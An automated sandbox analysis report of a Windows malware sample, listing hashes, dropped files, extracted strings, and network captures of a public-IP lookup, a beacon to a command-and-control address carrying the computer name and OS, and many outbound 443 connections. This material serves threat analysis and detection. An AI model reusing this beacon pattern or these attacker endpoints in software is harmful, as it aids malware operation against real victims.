Analysis Date: 2015-05-16 14:35:40
MD5: 413c96aa5ba28d9662eebc84c2f7a2ce
SHA1: 196c0b4c37f76305bd99188cb3e05d9403cb1610

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section md5: 1d3230314fef6547fb87499f517aebea sha1: 3902b3e4681db03526aecc2d5fd0e3845cb7ed0b size: 2048
Section .XDATA md5: 6ff1b993379dee4baf9839e9b90aa8e3 sha1: d9c1fdb64d4a05744e581fac0b247a56b5d3c186 size: 10240
Section .RSRC md5: c31c738dca8af47f636ddcc9f68e7659 sha1: 112c148cb763d3be3c119b11b52d8078953e42b1 size: 18944
Section relac md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .dAte md5: 53e979547d8c2ea86560ac45de08ae25 sha1: 53ea2cb716f312714685c92b6be27e419f8c746c size: 1536
Section .dAte md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Timestamp: 1997-10-28 22:08:58
PEhash: 303ff437fdfcf63a96ade161769ed165474e1148
IMPhash: dcba06312bdb1f6f83074da6658ac80e

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\loremoment.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\LOREE50E.txt
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\loremoment.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\loremoment.exe

Network Details:

DNS: icanhazip.com
Type: A
104.130.28.231
DNS: icanhazip.com
Type: A
23.253.254.67
DNS: icanhazip.com
Type: A
166.78.246.145
HTTP GET: http://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
HTTP GET: http://91.211.17.201:13342/MO12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Flows TCP: 192.168.1.1:1031 ➝ 104.130.28.231:80
Flows TCP: 192.168.1.1:1032 ➝ 91.211.17.201:13342
Flows TCP: 192.168.1.1:1033 ➝ 67.219.166.113:443
Flows TCP: 192.168.1.1:1034 ➝ 67.219.166.113:443
Flows TCP: 192.168.1.1:1035 ➝ 67.219.166.113:443
Flows TCP: 192.168.1.1:1036 ➝ 67.219.166.113:443
Flows TCP: 192.168.1.1:1037 ➝ 194.106.166.22:443
Flows TCP: 192.168.1.1:1038 ➝ 194.106.166.22:443
Flows TCP: 192.168.1.1:1039 ➝ 194.106.166.22:443
Flows TCP: 192.168.1.1:1040 ➝ 194.106.166.22:443
Flows TCP: 192.168.1.1:1041 ➝ 93.87.3.169:443
Flows TCP: 192.168.1.1:1042 ➝ 93.87.3.169:443
Flows TCP: 192.168.1.1:1043 ➝ 93.87.3.169:443
Flows TCP: 192.168.1.1:1044 ➝ 93.87.3.169:443
Flows TCP: 192.168.1.1:1045 ➝ 79.101.2.254:443
Flows TCP: 192.168.1.1:1046 ➝ 79.101.2.254:443
Flows TCP: 192.168.1.1:1047 ➝ 79.101.2.254:443
Flows TCP: 192.168.1.1:1048 ➝ 79.101.2.254:443
Flows TCP: 192.168.1.1:1049 ➝ 79.101.42.247:443
Flows TCP: 192.168.1.1:1050 ➝ 79.101.42.247:443
Flows TCP: 192.168.1.1:1051 ➝ 79.101.42.247:443
Flows TCP: 192.168.1.1:1052 ➝ 79.101.42.247:443
Flows TCP: 192.168.1.1:1053 ➝ 178.219.10.23:443
Flows TCP: 192.168.1.1:1054 ➝ 178.219.10.23:443
Flows TCP: 192.168.1.1:1055 ➝ 178.219.10.23:443
Flows TCP: 192.168.1.1:1056 ➝ 178.219.10.23:443
Flows TCP: 192.168.1.1:1057 ➝ 178.79.58.28:443
Flows TCP: 192.168.1.1:1058 ➝ 178.79.58.28:443
Flows TCP: 192.168.1.1:1059 ➝ 178.79.58.28:443
Flows TCP: 192.168.1.1:1060 ➝ 216.245.211.242:443
Flows TCP: 192.168.1.1:1061 ➝ 216.245.211.242:443
Flows TCP: 192.168.1.1:1062 ➝ 65.79.201.39:443
Flows TCP: 192.168.1.1:1063 ➝ 65.79.201.39:443
Flows TCP: 192.168.1.1:1064 ➝ 69.8.48.221:443
Flows TCP: 192.168.1.1:1065 ➝ 69.8.48.221:443
Flows TCP: 192.168.1.1:1066 ➝ 178.79.58.27:443
Flows TCP: 192.168.1.1:1067 ➝ 178.79.58.27:443
Flows TCP: 192.168.1.1:1068 ➝ 212.69.7.79:443
Flows TCP: 192.168.1.1:1069 ➝ 212.69.7.79:443
Flows TCP: 192.168.1.1:1070 ➝ 178.79.58.15:443
Flows TCP: 192.168.1.1:1071 ➝ 178.79.58.15:443
Flows TCP: 192.168.1.1:1072 ➝ 69.9.204.37:443
Flows TCP: 192.168.1.1:1073 ➝ 69.9.204.37:443
Flows TCP: 192.168.1.1:1074 ➝ 67.207.228.144:443
Flows TCP: 192.168.1.1:1075 ➝ 67.207.228.144:443
Flows TCP: 192.168.1.1:1076 ➝ 38.124.60.82:443
Flows TCP: 192.168.1.1:1077 ➝ 38.124.60.82:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 574f5736 343b2072   NT 6.1; WOW64; r
0x00000060 (00096)   763a3337 2e302920 4765636b 6f2f3230   v:37.0) Gecko/20
0x00000070 (00112)   31303031 30312046 69726566 6f782f33   100101 Firefox/3
0x00000080 (00128)   372e300d 0a486f73 743a2069 63616e68   7.0..Host: icanh
0x00000090 (00144)   617a6970 2e636f6d 0d0a4361 6368652d   azip.com..Cache-
0x000000a0 (00160)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000b0 (00176)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f4d4f31 322f434f 4d505554   GET /MO12/COMPUT
0x00000010 (00016)   45522d58 58585858 582f302f 35312d53   ER-XXXXXX/0/51-S
0x00000020 (00032)   50332f30 2f204854 54502f31 2e310d0a   P3/0/ HTTP/1.1..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 352e3020 2857696e 646f7773   lla/5.0 (Windows
0x00000050 (00080)   204e5420 362e313b 20574f57 36343b20    NT 6.1; WOW64; 
0x00000060 (00096)   72763a33 372e3029 20476563 6b6f2f32   rv:37.0) Gecko/2
0x00000070 (00112)   30313030 31303120 46697265 666f782f   0100101 Firefox/
0x00000080 (00128)   33372e30 0d0a486f 73743a20 39312e32   37.0..Host: 91.2
0x00000090 (00144)   31312e31 372e3230 313a3133 3334320d   11.17.201:13342.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   804c0103                              .L..


Strings
~+$%%%%*%-%*+*)
 $!%%%+
.%:)+****
04<49,44""
#04<9<<<977
2Z,.O<
"400994<4<<44,
.4+,4440D,"
4?B?B?1??B;
)8,--44-
<;;9<999</
<99??KKNKKK?;9
%9??K??K?5
ApphelpCheckExe
ApphelpCheckIME
ApphelpCheckInstallShieldPackage
ApphelpCheckMsiPackage
ApphelpCheckRunApp
ApphelpCheckShellObject
apphelp.dll
ApphelpFixMsiPackage
ApphelpFixMsiPackageExe
ApphelpFreeFileAttributes
ApphelpGetFileAttributes
ApphelpGetNTVDMInfo
ApphelpQueryModuleData
ApphelpShowDialog
ApphelpUpdateCacheEntry
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AtlAxAttachControl
AtlComPtrAssign
atl.dll
b<<<?<N<B494
%BRKKKKMGN5lzstL@IKhsvz];GGCosvzzhGHHKHKHHKGB
CAGetCACertificate
CAGetCAExpiration
CAGetCAFlags
CAGetCAProperty
CAGetCASecurity
CAGetCertTypeExpiration
CAGetCertTypeExtensions
CAGetCertTypeExtensionsEx
CAGetCertTypeFlags
CAGetCertTypeFlagsEx
CAGetCertTypeKeySpec
CAGetCertTypeProperty
CAGetCertTypePropertyEx
CAGetDN
CAInstallDefaultCertType
CAIsCertTypeCurrent
CAOIDAdd
CAOIDCreateNew
CAOIDDelete
[catBR
catsrv.DLL
certcli.dll
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
@.dAte
DeleteAtom
#%DK<<N<<//
EmAm8e
ExitProcess
FmtIdToPropStgName
FreePropVariantArray
$FxH,B
GetCatalogCRMClerk
GetCommandLineA
GetCommState
GetOEMCP
GetSystemDirectoryA
GetTickCount
%%HHM@@@KHHITNGKM@CHNNKKICIIMNKRMIHMHMHHMMMG@
Hiwww7Mi
%HKGGGGGKKGIIRKKGNKKMGIIGGRKNMGGKKKMGMMHGMMM@
IASGetDictionary
iassvcs.dll
I_NetLogonSamLogoff
I_NetLogonSamLogon
I_NetLogonSamLogonEx
I_NetLogonSamLogonWithFlags
I_NetLogonSendToSam
I_NetLogonUasLogoff
I_NetLogonUasLogon
I_NetServerAuthenticate
I_NetServerAuthenticate2
iprop.dll
Jl2H8iM
kernel32.dll
&K??KKNKKKB
{{krr{
loadperf.dll
LsExpandSubline
	)}]M.
mpr.dll
msls31.dll
msvcrt.dll
nddeapi.dll
NDdeSetTrustedShareW
netapi32.dll
NJwy[q)
nkpnkkmkkpppkkmknnknkknnnnkpmk|
odbc32.dll
OpenComponentLibraryTS
PropStgNameToFmtId
PropVariantClear
PropVariantCopy
REGAPI.dll
RegBuildNumberQuery
RegCdCreateA
RegCdCreateW
RegCdDeleteA
RegCdDeleteW
RegCdEnumerateA
RegCdEnumerateW
RegCdQueryA
RegCdQueryW
RegCloseServer
RegConsoleShadowQueryA
RegConsoleShadowQueryW
RegDefaultUserConfigQueryA
RegDefaultUserConfigQueryW
</requestedExecutionLevel>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false">
</requestedPrivileges>
<requestedPrivileges>
;%RKKKKK5K/
{rrffff{
$rsjq8
SdbCloseDatabase
SdbReadBinaryTag
</security>
<security>
SetErrorMode
SetFilePointer
SetServiceAsTrustedA
 SKG2g
SQLCloseCursor
SQLColAttribute
SQLColAttributeA
SQLColAttributes
SQLColAttributesA
SQLColAttributesW
SQLColAttributeW
SQLColumnPrivileges
SQLColumnPrivilegesA
SQLColumnPrivilegesW
SQLGetConnectAttrA
SQLGetConnectAttrW
SQLGetConnectOption
SQLGetConnectOptionA
SQLGetConnectOptionW
StgCreatePropSetStg
StgCreatePropStg
StgOpenPropStg
!This program cannot be run in DOS mode.
't>}Nt
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
trv.JR
Twww7spHq
u*+88++%+*****)
UB?B?1??B<<4
_uTPjdhX
vd6cqL
VwwwIi
WNetGetUserA
WNetGetUserW
WNetLogonNotify
WNetOpenEnumA
WNetOpenEnumW
WNetPropertyDialogA
WNetPropertyDialogW
wwwwL*
@.XDATA
y_h(-<
Y<;N9?9?;049
z/9NHKHKHHKG<B9